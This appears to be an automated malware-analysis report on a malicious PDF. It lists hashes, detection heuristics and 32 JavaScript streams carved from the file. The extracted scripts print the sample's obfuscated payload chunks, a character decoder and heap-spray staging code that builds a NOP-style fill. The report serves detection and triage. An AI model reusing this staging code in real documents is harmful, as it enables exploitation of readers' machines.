PDF malware analysis — malicious · d704f1f024ce176c

MALICIOUS

PDF

20.8 KB First seen: 2026-05-11

MD5: 8fe5cf3850d198dc951f6469ac36b400 SHA-1: 715a7dd073414d1673ad86d50ade376d06ee3cfa SHA-256: d704f1f024ce176c74e31990a86e887df465b66c09a44c64c5c063f58a57abbc

116 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell

The PDF file contains multiple embedded JavaScript streams, some of which exhibit obfuscation indicators. The presence of PDF_JAVASCRIPT and PDF_JS heuristics, along with the 'Script obfuscation indicators' signal, suggests that the JavaScript is designed to perform malicious actions, likely downloading and executing a secondary payload. The exact functionality is obscured by the obfuscation, preventing a more detailed analysis of the script's intent.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 4

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Matched line in script
```
/S /JavaScript
/JS (var nops='';for\(i=0;i<nnn2.length;i+=4\){c=0;for\(j=0;j<4;j++\)c=16*c+nnn2.charCodeAt\(i+j\)-65;nops+=String.fromCharCode\(c\);})
>>
```
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 32

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0010_001.js`	pdf-javascript-stream	PDF /JS object 10 at offset 0x35F8	40 bytes
SHA-256: `f9ae5a33db8c7c1304813e927490f51369c0114e1b7e481ce8d3cc0f2f95f72e`
Preview script First 1,000 lines of the extracted script var ppp=new Array();var nnn=new Array();
`javascript_obj0011_002.js`	pdf-javascript-stream	PDF /JS object 11 at offset 0x365E	34 bytes
SHA-256: `fdc99838ceb9639ee12dad66f323e13b77cbc4f9501e9adbac9e891dc54f85dd`
Preview script First 1,000 lines of the extracted script ppp[0]='MALIGJFJNLGJNJMECEHECLPE';
`javascript_obj0012_003.js`	pdf-javascript-stream	PDF /JS object 12 at offset 0x36BA	86 bytes
SHA-256: `70199203b17aab406916eaf3a009fb5470f925c1413c75163c007a403d19c30a`
Preview script First 1,000 lines of the extracted script ppp[1]='LBFKDBLFBDECECADIDBDMEMCJMLLANFIJCOBANCDLIBANEIAOGGJFHNMLLDPNCCNMHFHNIILICFE';
`javascript_obj0013_004.js`	pdf-javascript-stream	PDF /JS object 13 at offset 0x374A	42 bytes
SHA-256: `73ac344478724c26993671f8d97ca0fc2e99a5459418fea65a74cd2dffd5880f`
Preview script First 1,000 lines of the extracted script ppp[2]='KJICDGCEFMCLIJBGFDAPJNFCIJNOAOIF';
`javascript_obj0015_006.js`	pdf-javascript-stream	PDF /JS object 15 at offset 0x37FE	74 bytes
SHA-256: `edd20eb87b3eb854765931e13b2f514c7fd0dab64736a8e861ba668e7e90c84e`
Preview script First 1,000 lines of the extracted script ppp[4]='OFCMFPINFNGFLPJFMMFKLMIOPLJGAGJHCMHCDALJJBLMADGPFCOFEHIMDOABEKFL';
`javascript_obj0016_007.js`	pdf-javascript-stream	PDF /JS object 16 at offset 0x3882	90 bytes
SHA-256: `6acd95a8315a7a0971bab688d023bd32ef916444bb989c5682076e788d263a8a`
Preview script First 1,000 lines of the extracted script ppp[5]='KAAJIDCKFGNLGOAJNFICBBNLGJBLOBLBBFJINPBPMDELBLOFMEPONMNGPGGCNMMGAOBIFBJCJEHHKEPO';
`javascript_obj0019_010.js`	pdf-javascript-stream	PDF /JS object 19 at offset 0x39C2	38 bytes
SHA-256: `e9023740848ad989745e1575efa28bfee7c4a14e0f62610db61a476d3ea8f158`
Preview script First 1,000 lines of the extracted script ppp[8]='OFNKFIHLLDHFBIMBDOPFFDHACMLI';
`javascript_obj0020_011.js`	pdf-javascript-stream	PDF /JS object 20 at offset 0x3A22	82 bytes
SHA-256: `b7f6b177d57e12dcbb1d0346acd00f8fa87e7c8d427880ccd788d0dca2e3e40d`
Preview script First 1,000 lines of the extracted script ppp[9]='HOIKAHKAPJGJJKPIDNHLEAGIENGIPPFBBEPDOOFEJIJJJICJAOCEPCNMGJPNMGKEJEONBFCG';
`javascript_obj0021_012.js`	pdf-javascript-stream	PDF /JS object 21 at offset 0x3AAE	75 bytes
SHA-256: `c9674707d78b1a7c5f9f5913efaead8b3893d95d22b058e5963f76bed23e460c`
Preview script First 1,000 lines of the extracted script ppp[10]='MHOICCFMAPBCHKHGEFGHMNGEOKCOLMDMMABLFKCIBFCNMHLHOAPLBOLAKIJDJNNP';
`javascript_obj0022_013.js`	pdf-javascript-stream	PDF /JS object 22 at offset 0x3B33	83 bytes
SHA-256: `ca2715548503f49900918b3fb176856617458bb1502c48ee36df071dee3730d9`
Preview script First 1,000 lines of the extracted script ppp[11]='BEFNJJHCNLKOLPFJFNBOLEOLJHGGFLEAGMKOPCMMEHGKFBPHMOHBEPPBGKACIEIEIBPBCHAO';
`javascript_obj0025_016.js`	pdf-javascript-stream	PDF /JS object 25 at offset 0x3C56	75 bytes
SHA-256: `00162f4a9547f3a03375d24b31a18e0f6a303360e97abe2229c96a0c12307e48`
Preview script First 1,000 lines of the extracted script ppp[14]='DMLPOIOFIKDGEKBNGIMMBJCEIBEFKNMKOLCOPMDOONNGKNHFAKEHPDEGOIMFGODG';
`javascript_obj0026_017.js`	pdf-javascript-stream	PDF /JS object 26 at offset 0x3CDB	63 bytes
SHA-256: `a7586ffb419bfadfa709c42a21f50d7fcc435a16ad416f8230aa29af48fb6b2f`
Preview script First 1,000 lines of the extracted script ppp[15]='EIKBHEFCGOGACAPHEKMCIJFJNOGMICOGNFADHMPMBLJCLFAFJMLJ';
`javascript_obj0027_018.js`	pdf-javascript-stream	PDF /JS object 27 at offset 0x3D54	47 bytes
SHA-256: `e41d30030310200886c3eefcf49338581af03583bd33f5cfb2a5c6daa46217ee`
Preview script First 1,000 lines of the extracted script ppp[16]='AEIKDJNFLHPIAOJDLEHMGLFIPOOGOGJBFPBA';
`javascript_obj0029_020.js`	pdf-javascript-stream	PDF /JS object 29 at offset 0x3E0A	51 bytes
SHA-256: `b9bec3d963b0059bd1995fc02dbe736f79bb9df0af8975f5832863a74410edc6`
Preview script First 1,000 lines of the extracted script ppp[18]='EDDCAFICGCPGKACIJPLOPJNODDOKHAPMDCMOCCDO';
`javascript_obj0030_021.js`	pdf-javascript-stream	PDF /JS object 30 at offset 0x3E77	91 bytes
SHA-256: `769cda5a2e0e3958d3267f5bcb2b5d81524c0f3bb01ee05d02a667da435a92bf`
Preview script First 1,000 lines of the extracted script ppp[19]='KJGEKBJIGBPFMPNOECEDENICJLMIKDAFGEGFFODLOEMGOPNBAFBIHFLNMEMKGIMABMBAKKFDLKBPKBNO';
`javascript_obj0031_022.js`	pdf-javascript-stream	PDF /JS object 31 at offset 0x3F0C	55 bytes
SHA-256: `95cd2fc4db12be6cc551b4717b491f8cba835f5751a9957f3cbc8fbd851a7f67`
Preview script First 1,000 lines of the extracted script ppp[20]='BINIMDCCNGOGFEFJIGAMPBFKPADCLPPBACEKIEBMFNHM';
`javascript_obj0032_023.js`	pdf-javascript-stream	PDF /JS object 32 at offset 0x3F7D	71 bytes
SHA-256: `761a5a341dcf9f4650c6c28653c31bdee7380389a7ebdd7738cf28ee82c2c1b9`
Preview script First 1,000 lines of the extracted script ppp[21]='GIDDPMEJNPPLKLMBHAJIKMONFIOLGEPAJJDOPMJGOKIBPKGJJGMPIDMKAAHM';
`javascript_obj0034_025.js`	pdf-javascript-stream	PDF /JS object 34 at offset 0x4047	55 bytes
SHA-256: `998779a7f25d669abf5dbb131c8ad8a4d95d2530ec19100a9c039c0bb88358da`
Preview script First 1,000 lines of the extracted script ppp[23]='CAICAKMAHNKKPMHEILDBLJEJBNLLEHAOGDOBOAPBMPHF';
`javascript_obj0035_026.js`	pdf-javascript-stream	PDF /JS object 35 at offset 0x40B8	71 bytes
SHA-256: `98fbec523df151d0bd1b1784af350dd9ed6ff722db880812e08db41b217b7a48`
Preview script First 1,000 lines of the extracted script ppp[24]='NBGJIJMJOHJADGLMNBCNLIODOHFPFAJOCFAEEDEMNDFNOLANMGKHCEHHIPIB';
`javascript_obj0036_027.js`	pdf-javascript-stream	PDF /JS object 36 at offset 0x4139	83 bytes
SHA-256: `0075470ef481ab6f46ed2a249d021f9585b78cc7be009d13538224d193ef8612`
Preview script First 1,000 lines of the extracted script ppp[25]='LLELDMKFBLPGCHOKIJJEBMDNLNMDJPBBNKKOFMCDAENJANNBHELLINGAJBNBIGIIKJGNLDFI';
`javascript_obj0038_029.js`	pdf-javascript-stream	PDF /JS object 38 at offset 0x420B	47 bytes
SHA-256: `48428180ef0bd47a8feb290130c1a9c5c87094921d835f8ac0e87bcc42b26214`
Preview script First 1,000 lines of the extracted script ppp[27]='ANKKCEOFGBNAANCAPHLENEDIKAFKPNPFCFFJ';
`javascript_obj0039_030.js`	pdf-javascript-stream	PDF /JS object 39 at offset 0x4274	95 bytes
SHA-256: `b16f936c188783251fbdaf8ff27efc30a22a8582533b345f37e37d22c74c7bd1`
Preview script First 1,000 lines of the extracted script ppp[28]='BBJNHCBLDNIPPIEMHAFLDHOCKBEOPFKAHGHJPLPDKKMNAPMKPEIPGCFBFNIEAKFPDFEJHMCJDEODBBHBHNPJ';
`javascript_obj0040_031.js`	pdf-javascript-stream	PDF /JS object 40 at offset 0x430D	79 bytes
SHA-256: `98b599a4ef896982bf43e6902e4f5b523d83081eea7c3b18fad84708c0f86ab2`
Preview script First 1,000 lines of the extracted script ppp[29]='MIHGCDGMBLKNBIODKIJGIBBFFGPIMFOHKNEEEBEKHGGECDHLMEAKNOPLHFLGFIDCNCAC';
`javascript_obj0041_032.js`	pdf-javascript-stream	PDF /JS object 41 at offset 0x4396	103 bytes
SHA-256: `3e27ff88ae6dc136dc7692231aa10e25961ab3e2d1d276d417a58342db00ae3b`
Preview script First 1,000 lines of the extracted script ppp[30]='KELDHHGKJBHGKLGMHADKMJMCMKHBHNIHJJFFDFBGPLGLAJCOMKNLDHEOIGBNLIJMJEDJGIEEMKLJFAFFLDJPKKPCPCFI';
`javascript_obj0042_033.js`	pdf-javascript-stream	PDF /JS object 42 at offset 0x4437	51 bytes
SHA-256: `9a6e7484171bda637927fa51f768ca9f346ea6e42ead4e3b80a35ee381f6ee3f`
Preview script First 1,000 lines of the extracted script ppp[31]='EEPOMNJBGEKNKNDIDDCFHNLGNPJIILDDMHODMBKL';
`javascript_obj0048_039.js`	pdf-javascript-stream	PDF /JS object 48 at offset 0x4608	49 bytes
SHA-256: `5919c0d1d84a5a746be9f27963881ad88d4190b52b00795a7bba41f91757774f`
Preview script First 1,000 lines of the extracted script var pay='';for (i=0;i<ppp.length;i++)pay+=ppp[i];
`javascript_obj0049_040.js`	pdf-javascript-stream	PDF /JS object 49 at offset 0x4675	51 bytes
SHA-256: `9882b77792295f132527561d187f85c94b2cd973564768e464959f18c36b3adf`
Preview script First 1,000 lines of the extracted script var nnn2='';for (i=0;i<nnn.length;i++)nnn2+=nnn[i];
`javascript_obj0050_041.js`	pdf-javascript-stream	PDF /JS object 50 at offset 0x46E4	121 bytes
SHA-256: `d0c51bf80c2b774fd7e3f148d01ffbc945e29725fa0df8312c7ee2e2af01f03e`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var nops='';for(i=0;i<nnn2.length;i+=4){c=0;for(j=0;j<4;j++)c=16*c+nnn2.charCodeAt(i+j)-65;nops+=String.fromCharCode(c);}
`javascript_obj0051_042.js`	pdf-javascript-stream	PDF /JS object 51 at offset 0x479F	119 bytes
SHA-256: `b1b2b43288ce70ec200b2f13b08007f27b53e440ecc0d66f3597d77149e048d4`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var coqu='';for(i=0;i<pay.length;i+=4){c=0;for(j=0;j<4;j++)c=16*c+pay.charCodeAt(i+j)-65;coqu+=String.fromCharCode(c);}
`javascript_obj0052_043.js`	pdf-javascript-stream	PDF /JS object 52 at offset 0x4858	42 bytes
SHA-256: `cdb00d413dd3dc5b9d3e3780f1775e73dbb44b071a24019bd9d4f5472f12fea2`
Preview script First 1,000 lines of the extracted script var nop='';for(i=0;i<128;i++)nop=nop+nops;
`javascript_obj0053_044.js`	pdf-javascript-stream	PDF /JS object 53 at offset 0x48BE	40 bytes
SHA-256: `8685060b59c6fc8b97b63aec5887d1ab60834301ec5794892d52bb5db733a84c`
Preview script First 1,000 lines of the extracted script hpb=nop+coqu;big=nops;spr=20+hpb.length;
`javascript_obj0054_045.js`	pdf-javascript-stream	PDF /JS object 54 at offset 0x4920	96 bytes
SHA-256: `5ce01293f72e5740d2bf4e966b81d53dd0196f05e4122c4c10629d53ae99ccf0`
Preview script First 1,000 lines of the extracted script while(big.length<spr){b1=big+big;big=b1};fill=big.substring(0,spr);lll=1<<18;nnn=big.length-spr;

Open this report in the interactive analyzer, or submit your own file for analysis.